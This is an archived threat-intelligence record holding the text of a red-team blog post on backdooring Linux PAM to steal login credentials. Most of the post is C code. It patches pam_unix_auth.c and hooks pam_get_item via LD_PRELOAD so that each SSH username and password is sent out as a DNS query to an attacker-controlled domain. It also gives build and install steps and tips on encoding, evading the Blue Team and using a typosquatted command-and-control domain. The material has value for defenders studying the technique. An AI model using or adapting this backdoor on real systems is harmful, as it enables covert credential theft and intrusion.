{
	"id": "7c19837f-7e2f-4073-adee-6c0012094d36",
	"created_at": "2026-04-06T01:29:16.631967Z",
	"updated_at": "2026-04-10T03:21:37.023512Z",
	"deleted_at": null,
	"sha1_hash": "f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db",
	"title": "Exfiltrating credentials via PAM backdoors \u0026 DNS requests :: DoomsDay Vault",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 121532,
	"plain_text": "Exfiltrating credentials via PAM backdoors \u0026 DNS requests ::\r\nDoomsDay Vault\r\nBy DoomsDay Vault\r\nArchived: 2026-04-06 00:28:48 UTC\r\nThe Wayback Machine - https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\n2018-06-27 13:37:00 +0000\r\n         Probably one of the most well-known post-explotation techniques used in pentests, and in Red Team\r\noperations, is to drop a backdoor in the PAM ecosystem in order to collect valid credentials. The credentials\r\ncatched by our backdoor will help us to perform easily the lateral movement between machines. We can achieve\r\nthis though different options.\r\n         An interesting twist is to mix up this technique with the classic DNS exfiltration, so we can send the\r\ncredentials to our C\u0026C without worry about firewalls and traffic rules. We only need to send a DNS request to the\r\nDNS server used by the machine, then it will be forwarded to other DNS servers, and at some point the request\r\nwill hit our Authoritative DNS Server. So we can retrieve silently credentials using this well-known covert\r\nchannel.\r\n         Our roadmap is pretty simple: add a custom PAM module that logs the credential in plaintext and send it to\r\nour C\u0026C though a DNS resolution.\r\n         As side note: even if this is an old and well-known tactic, it keep being a really cool way to show the needed\r\nof file integrity controls. Root a server, wait until an administrator or operator log in via SSH and enjoy! :)\r\n0x01 Modifying pam_unix_auth.c\r\n         (We are not going to explain what is PAM or how it works. To get a deeper information about PAM, use\r\nman ).\r\n         In order to retrieve the user and password in clear text we are going to replace the valid pam_unix.so\r\nmodule to one modified by us. If we check the source code of the original module (download the source code of\r\nthe PAM version installed in your target server from here), we can see at the pam_unix_auth.c file a function\r\ncalled pam_sm_authenticate, and inside this function a call to _unix_verify_password which arguments are the\r\nusername and password used in the authentication:\r\n// (...)\r\n/* verify the password of this user */\r\nretval = _unix_verify_password(pamh, name, p, ctrl);\r\nname = p = NULL;\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 1 of 13\n\nAUTH_RETURN;\r\n}\r\n// (...)\r\n         So looks fine to inject our exfiltration logic at this point. As PoC, we can use this snippet of code (Silver\r\nMoon - 29/4/2009), so the main exfiltration logic is implemented yet (this code has some bugs -for example it\r\ndoes not take the server IP from resolv.conf-… so if you are going to use it in a real pentest, reimplement the code\r\n;D). Lets vim the pam_unix_auth.c file to add the functions and headers needed!:\r\n/* Fun starts here :)\r\n * pam_sm_authenticate() performs UNIX/shadow authentication\r\n *\r\n * First, if shadow support is available, attempt to perform\r\n * authentication using shadow passwords. If shadow is not\r\n * available, or user does not have a shadow password, fallback\r\n * onto a normal UNIX authentication\r\n */\r\n/* Backdoor - DNS code extracted from https://gist.github.com/fffaraz/9d9170b57791c28ccda9255b48315168 */\r\n// The code sucks a lot. It is Sunday and I have a hangover, so I am not in the mood to fix it.\r\n// Tons of bug and useless code that you should remove. Forgive me, please :)\r\n#include \u003csys/socket.h\u003e\r\n#include \u003carpa/inet.h\u003e\r\n#include \u003cnetinet/in.h\u003e\r\n//List of DNS Servers registered on the system\r\nchar dns_servers[10][100];\r\nint dns_server_count = 0;\r\n//Types of DNS resource records :)\r\n \r\n#define T_A 1 //Ipv4 address\r\n#define T_NS 2 //Nameserver\r\n#define T_CNAME 5 // canonical name\r\n#define T_SOA 6 /* start of authority zone */\r\n#define T_PTR 12 /* domain name pointer */\r\n#define T_MX 15 //Mail server\r\n \r\n//Function Prototypes\r\nvoid ngethostbyname (unsigned char* , int);\r\nvoid ChangetoDnsNameFormat (unsigned char*,unsigned char*);\r\nunsigned char* ReadName (unsigned char*,unsigned char*,int*);\r\nvoid get_dns_servers();\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 2 of 13\n\n//DNS header structure\r\nstruct DNS_HEADER\r\n{\r\n unsigned short id; // identification number\r\n \r\n unsigned char rd :1; // recursion desired\r\n unsigned char tc :1; // truncated message\r\n unsigned char aa :1; // authoritive answer\r\n unsigned char opcode :4; // purpose of message\r\n unsigned char qr :1; // query/response flag\r\n \r\n unsigned char rcode :4; // response code\r\n unsigned char cd :1; // checking disabled\r\n unsigned char ad :1; // authenticated data\r\n unsigned char z :1; // its z! reserved\r\n unsigned char ra :1; // recursion available\r\n \r\n unsigned short q_count; // number of question entries\r\n unsigned short ans_count; // number of answer entries\r\n unsigned short auth_count; // number of authority entries\r\n unsigned short add_count; // number of resource entries\r\n};\r\n \r\n//Constant sized fields of query structure\r\nstruct QUESTION\r\n{\r\n unsigned short qtype;\r\n unsigned short qclass;\r\n};\r\n \r\n//Constant sized fields of the resource record structure\r\n#pragma pack(push, 1)\r\nstruct R_DATA\r\n{\r\n unsigned short type;\r\n unsigned short _class;\r\n unsigned int ttl;\r\n unsigned short data_len;\r\n};\r\n#pragma pack(pop)\r\n \r\n//Pointers to resource record contents\r\nstruct RES_RECORD\r\n{\r\n unsigned char *name;\r\n struct R_DATA *resource;\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 3 of 13\n\nunsigned char *rdata;\r\n};\r\n \r\n//Structure of a Query\r\ntypedef struct\r\n{\r\n unsigned char *name;\r\n struct QUESTION *ques;\r\n} QUERY;\r\n/*\r\n * Perform a DNS query by sending a packet\r\n * */\r\nvoid ngethostbyname(unsigned char *host , int query_type)\r\n{\r\n unsigned char buf[65536],*qname,*reader;\r\n int i , j , stop , s;\r\n \r\n struct sockaddr_in a;\r\n \r\n struct RES_RECORD answers[20],auth[20],addit[20]; //the replies from the DNS server\r\n struct sockaddr_in dest;\r\n \r\n struct DNS_HEADER *dns = NULL;\r\n struct QUESTION *qinfo = NULL;\r\n \r\n printf(\"Resolving %s\" , host);\r\n \r\n s = socket(AF_INET , SOCK_DGRAM , IPPROTO_UDP); //UDP packet for DNS queries\r\n \r\n dest.sin_family = AF_INET;\r\n dest.sin_port = htons(53);\r\n dest.sin_addr.s_addr = inet_addr(dns_servers[0]); //dns servers\r\n \r\n //Set the DNS structure to standard queries\r\n dns = (struct DNS_HEADER *)\u0026buf;\r\n \r\n dns-\u003eid = (unsigned short) htons(getpid());\r\n dns-\u003eqr = 0; //This is a query\r\n dns-\u003eopcode = 0; //This is a standard query\r\n dns-\u003eaa = 0; //Not Authoritative\r\n dns-\u003etc = 0; //This message is not truncated\r\n dns-\u003erd = 1; //Recursion Desired\r\n dns-\u003era = 0; //Recursion not available! hey we dont have it (lol)\r\n dns-\u003ez = 0;\r\n dns-\u003ead = 0;\r\n dns-\u003ecd = 0;\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 4 of 13\n\ndns-\u003ercode = 0;\r\n dns-\u003eq_count = htons(1); //we have only 1 question\r\n dns-\u003eans_count = 0;\r\n dns-\u003eauth_count = 0;\r\n dns-\u003eadd_count = 0;\r\n \r\n //point to the query portion\r\n qname =(unsigned char*)\u0026buf[sizeof(struct DNS_HEADER)];\r\n \r\n ChangetoDnsNameFormat(qname , host);\r\n qinfo =(struct QUESTION*)\u0026buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)]; //fill it\r\n \r\n qinfo-\u003eqtype = htons( query_type ); //type of the query , A , MX , CNAME , NS etc\r\n qinfo-\u003eqclass = htons(1); //its internet (lol)\r\n \r\n printf(\"\\nSending Packet...\");\r\n if( sendto(s,(char*)buf,sizeof(struct DNS_HEADER) + (strlen((const char*)qname)+1) + sizeof(struct QUESTION)\r\n {\r\n perror(\"sendto failed\");\r\n }\r\n printf(\"Done\");\r\n \r\n //Receive the answer\r\n i = sizeof dest;\r\n printf(\"\\nReceiving answer...\");\r\n if(recvfrom (s,(char*)buf , 65536 , 0 , (struct sockaddr*)\u0026dest , (socklen_t*)\u0026i ) \u003c 0)\r\n {\r\n perror(\"recvfrom failed\");\r\n }\r\n printf(\"Done\");\r\n \r\n dns = (struct DNS_HEADER*) buf;\r\n \r\n //move ahead of the dns header and the query field\r\n reader = \u0026buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname)+1) + sizeof(struct QUESTION)];\r\n \r\n printf(\"\\nThe response contains : \");\r\n printf(\"\\n %d Questions.\",ntohs(dns-\u003eq_count));\r\n printf(\"\\n %d Answers.\",ntohs(dns-\u003eans_count));\r\n printf(\"\\n %d Authoritative Servers.\",ntohs(dns-\u003eauth_count));\r\n printf(\"\\n %d Additional records.\\n\\n\",ntohs(dns-\u003eadd_count));\r\n \r\n //Start reading answers\r\n stop=0;\r\n \r\n for(i=0;i\u003cntohs(dns-\u003eans_count);i++)\r\n {\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 5 of 13\n\nanswers[i].name=ReadName(reader,buf,\u0026stop);\r\n reader = reader + stop;\r\n \r\n answers[i].resource = (struct R_DATA*)(reader);\r\n reader = reader + sizeof(struct R_DATA);\r\n \r\n if(ntohs(answers[i].resource-\u003etype) == 1) //if its an ipv4 address\r\n {\r\n answers[i].rdata = (unsigned char*)malloc(ntohs(answers[i].resource-\u003edata_len));\r\n \r\n for(j=0 ; j\u003cntohs(answers[i].resource-\u003edata_len) ; j++)\r\n {\r\n answers[i].rdata[j]=reader[j];\r\n }\r\n \r\n answers[i].rdata[ntohs(answers[i].resource-\u003edata_len)] = '\\0';\r\n \r\n reader = reader + ntohs(answers[i].resource-\u003edata_len);\r\n }\r\n else\r\n {\r\n answers[i].rdata = ReadName(reader,buf,\u0026stop);\r\n reader = reader + stop;\r\n }\r\n }\r\n \r\n //read authorities\r\n for(i=0;i\u003cntohs(dns-\u003eauth_count);i++)\r\n {\r\n auth[i].name=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n \r\n auth[i].resource=(struct R_DATA*)(reader);\r\n reader+=sizeof(struct R_DATA);\r\n \r\n auth[i].rdata=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n }\r\n \r\n //read additional\r\n for(i=0;i\u003cntohs(dns-\u003eadd_count);i++)\r\n {\r\n addit[i].name=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n \r\n addit[i].resource=(struct R_DATA*)(reader);\r\n reader+=sizeof(struct R_DATA);\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 6 of 13\n\nif(ntohs(addit[i].resource-\u003etype)==1)\r\n {\r\n addit[i].rdata = (unsigned char*)malloc(ntohs(addit[i].resource-\u003edata_len));\r\n for(j=0;j\u003cntohs(addit[i].resource-\u003edata_len);j++)\r\n addit[i].rdata[j]=reader[j];\r\n \r\n addit[i].rdata[ntohs(addit[i].resource-\u003edata_len)]='\\0';\r\n reader+=ntohs(addit[i].resource-\u003edata_len);\r\n }\r\n else\r\n {\r\n addit[i].rdata=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n }\r\n }\r\n \r\n //print answers\r\n printf(\"\\nAnswer Records : %d \\n\" , ntohs(dns-\u003eans_count) );\r\n for(i=0 ; i \u003c ntohs(dns-\u003eans_count) ; i++)\r\n {\r\n printf(\"Name : %s \",answers[i].name);\r\n \r\n if( ntohs(answers[i].resource-\u003etype) == T_A) //IPv4 address\r\n {\r\n long *p;\r\n p=(long*)answers[i].rdata;\r\n a.sin_addr.s_addr=(*p); //working without ntohl\r\n printf(\"has IPv4 address : %s\",inet_ntoa(a.sin_addr));\r\n }\r\n \r\n if(ntohs(answers[i].resource-\u003etype)==5)\r\n {\r\n //Canonical name for an alias\r\n printf(\"has alias name : %s\",answers[i].rdata);\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n \r\n //print authorities\r\n printf(\"\\nAuthoritive Records : %d \\n\" , ntohs(dns-\u003eauth_count) );\r\n for( i=0 ; i \u003c ntohs(dns-\u003eauth_count) ; i++)\r\n {\r\n \r\n printf(\"Name : %s \",auth[i].name);\r\n if(ntohs(auth[i].resource-\u003etype)==2)\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 7 of 13\n\n{\r\n printf(\"has nameserver : %s\",auth[i].rdata);\r\n }\r\n printf(\"\\n\");\r\n }\r\n \r\n //print additional resource records\r\n printf(\"\\nAdditional Records : %d \\n\" , ntohs(dns-\u003eadd_count) );\r\n for(i=0; i \u003c ntohs(dns-\u003eadd_count) ; i++)\r\n {\r\n printf(\"Name : %s \",addit[i].name);\r\n if(ntohs(addit[i].resource-\u003etype)==1)\r\n {\r\n long *p;\r\n p=(long*)addit[i].rdata;\r\n a.sin_addr.s_addr=(*p);\r\n printf(\"has IPv4 address : %s\",inet_ntoa(a.sin_addr));\r\n }\r\n printf(\"\\n\");\r\n }\r\n return;\r\n}\r\n \r\n/*\r\n *\r\n * */\r\nu_char* ReadName(unsigned char* reader,unsigned char* buffer,int* count)\r\n{\r\n unsigned char *name;\r\n unsigned int p=0,jumped=0,offset;\r\n int i , j;\r\n \r\n *count = 1;\r\n name = (unsigned char*)malloc(256);\r\n \r\n name[0]='\\0';\r\n \r\n //read the names in 3www6google3com format\r\n while(*reader!=0)\r\n {\r\n if(*reader\u003e=192)\r\n {\r\n offset = (*reader)*256 + *(reader+1) - 49152; //49152 = 11000000 00000000 ;)\r\n reader = buffer + offset - 1;\r\n jumped = 1; //we have jumped to another location so counting wont go up!\r\n }\r\n else\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 8 of 13\n\n{\r\n name[p++]=*reader;\r\n }\r\n \r\n reader = reader+1;\r\n \r\n if(jumped==0)\r\n {\r\n *count = *count + 1; //if we havent jumped to another location then we can count up\r\n }\r\n }\r\n \r\n name[p]='\\0'; //string complete\r\n if(jumped==1)\r\n {\r\n *count = *count + 1; //number of steps we actually moved forward in the packet\r\n }\r\n \r\n //now convert 3www6google3com0 to www.google.com\r\n for(i=0;i\u003c(int)strlen((const char*)name);i++)\r\n {\r\n p=name[i];\r\n for(j=0;j\u003c(int)p;j++)\r\n {\r\n name[i]=name[i+1];\r\n i=i+1;\r\n }\r\n name[i]='.';\r\n }\r\n name[i-1]='\\0'; //remove the last dot\r\n return name;\r\n}\r\n \r\n/*\r\n * Get the DNS servers from /etc/resolv.conf file on Linux\r\n * */\r\nvoid get_dns_servers()\r\n{\r\n FILE *fp;\r\n char line[200] , *p;\r\n if((fp = fopen(\"/etc/resolv.conf\" , \"r\")) == NULL)\r\n {\r\n printf(\"Failed opening /etc/resolv.conf file \\n\");\r\n }\r\n \r\n while(fgets(line , 200 , fp))\r\n {\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 9 of 13\n\nif(line[0] == '#')\r\n {\r\n continue;\r\n }\r\n if(strncmp(line , \"nameserver\" , 10) == 0)\r\n {\r\n p = strtok(line , \" \");\r\n p = strtok(NULL , \" \");\r\n \r\n //p now is the dns ip :)\r\n //????\r\n }\r\n }\r\n // EDIT THIS. It is a PoC\r\n strcpy(dns_servers[0] , \"127.0.0.1\");\r\n \r\n}\r\n \r\n/*\r\n * This will convert www.google.com to 3www6google3com\r\n * got it :)\r\n * */\r\nvoid ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)\r\n{\r\n int lock = 0 , i;\r\n strcat((char*)host,\".\");\r\n \r\n for(i = 0 ; i \u003c strlen((char*)host) ; i++)\r\n {\r\n if(host[i]=='.')\r\n {\r\n *dns++ = i-lock;\r\n for(;lock\u003ci;lock++)\r\n {\r\n *dns++=host[lock];\r\n }\r\n lock++; //or lock=i+1;\r\n }\r\n }\r\n *dns++='\\0';\r\n}\r\n#define _UNIX_AUTHTOK \"-UN*X-PASS\"\r\n// (...)\r\n         And, lastly this little edit:\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 10 of 13\n\n// (...)\r\n/* verify the password of this user */\r\n retval = _unix_verify_password(pamh, name, p, ctrl);\r\n unsigned char hostname[100];\r\n get_dns_servers();\r\n snprintf(hostname, sizeof(hostname), \"%s.%s.nowhere.local\", name, p); // Change it with your domain\r\n if (fork() == 0) {\r\n ngethostbyname(hostname, T_A);\r\n }\r\n name = p = NULL;\r\n// (...)\r\n         Compile the module (./configure \u0026\u0026 make) and replace the original pam_unix.so with our version, then\r\nopen a tcpdump / wireshark and log in the machine via SSH:\r\nDNS 96 Standard query 0x6d43 A mothra.RabbitHunt3r.nowhere.local\r\n         Nice! a DNS request was done, so we can exfiltrate usernames and passwords to an external server\r\ncontrolled by us. But now we have a problem: what happens with uppercase / lowercase / symbols used in\r\npasswords? Later in section “0x03 Communcation with C\u0026C” we will discuss this point.\r\n0x02 LD_PRELOAD all the things!\r\n         In some cases another approach will be needed. If the server performs any type of file integrity check to\r\ncritical binaries (as pam_unix.so and other modules are) or configuration files, we need to move to the classic\r\nLD_PRELOAD tactic. We are going to pre-load a shared object that hooks some functions used by PAM, so we\r\ncan inject easily our exfiltration logic inside.\r\n         Our target function will be pam_get_item. When this function is called with the item type\r\nPAM_AUTHTOK as argument, it retrieves the authentication token used. We are going to hook this function, so\r\nwhen it is called we are going to call pam_get_user() to retrieve the username, then call the original pam_get_item\r\n(to obtain the correct return value and the authentication token), exfiltrate it via DNS and lastly return the value\r\nobtained before. Easy peasy!\r\n/* Classic LD_PRELOAD PAM backdoor with DNS exfiltration */\r\n// Author: Juan Manuel Fernandez (@TheXC3LL)\r\n#define _GNU_SOURCE\r\n#include \u003csecurity/pam_modules.h\u003e\r\n#include \u003csecurity/pam_ext.h\u003e\r\n#include \u003csecurity/pam_modutil.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstring.h\u003e\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 11 of 13\n\n#include \u003csys/types.h\u003e\r\n#include \u003cunistd.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003cdlfcn.h\u003e\r\n#include \u003csys/stat.h\u003e\r\n#include \u003csignal.h\u003e\r\n// Insert here all the headers and functions needed for the DNS request\r\n//(...)\r\ntypedef int (*orig_ftype) (const pam_handle_t *pamh, int item_type, const void **item);\r\n \r\nint pam_get_item(const pam_handle_t *pamh, int item_type, const void **item) {\r\n int retval;\r\n int pid;\r\n const char *name;\r\n orig_ftype orig_pam;\r\n orig_pam = (orig_ftype)dlsym(RTLD_NEXT, \"pam_get_item\");\r\n \r\n // Call original function so we log password\r\n retval = orig_pam(pamh, item_type, item);\r\n \r\n // Log credential\r\n if (item_type == PAM_AUTHTOK \u0026\u0026 retval == PAM_SUCCESS \u0026\u0026 *item != NULL) {\r\nunsigned char hostname[256];\r\n get_dns_servers();\r\n pam_get_user((pam_handle_t *)pamh, \u0026name, NULL);\r\n snprintf(hostname, sizeof(hostname), \"%s.%s.nowhere.local\", name, *item); // Change it with your domain\r\n if (fork() == 0) {\r\n ngethostbyname(hostname, T_A);\r\n }\r\n }\r\n \r\n return retval;\r\n}\r\n         Compile ( gcc pam_fucked.c -shared -fPIC pam_fucked.so ), stop the SSH daemon and relaunch it with\r\nLD_PRELOAD=/../module/location…/.\r\n         The use of LD_PRELOAD has few negative side effects, like the needed of restart the daemon, so it can\r\ngenerate other kind of events that can alert the Blue Team. In the other hand, if you are going to restart a critical\r\nservice as SSH you must operate from a point outside of SSH (maybe a reverse shell) and keep an eye to avoid\r\nterminating the current sessions :).\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 12 of 13\n\n0x03 Communcation with C\u0026C\r\n         As we stated before, we need to encode the data that will be exfiltrated (and in a real pentest encrypt this\r\ninformation). The best options are to encode it as hexadecimal (but the size is doubled so it is not the best idea) or\r\nas base32 (care with the pad symbol). The C\u0026C must be configured as an authoritative DNS and the best idea is to\r\nuse a domain typosquatted with a faked whois that simulates real domain used by the company.\r\n         You can install a real DNS server, or just create the needed logic using python and dnslib :).\r\n0x04 Final words\r\n         I hope you find cool the idea of exfiltrate credentials via a classic covert channel like DNS. It is a really easy\r\nway to obtain new credentials in a recently compromised server and conquer other points of the net.\r\n         As I always say, if you find a typo or want to comment something, feel free to ping me at twitter\r\n(@TheXC3LL).\r\nSource: https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nhttps://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/"
	],
	"report_names": [
		"PAM-backdoor-DNS"
	],
	"threat_actors": [],
	"ts_created_at": 1775438956,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db.pdf",
		"text": "https://archive.orkl.eu/f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db.txt",
		"img": "https://archive.orkl.eu/f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db.jpg"
	}
}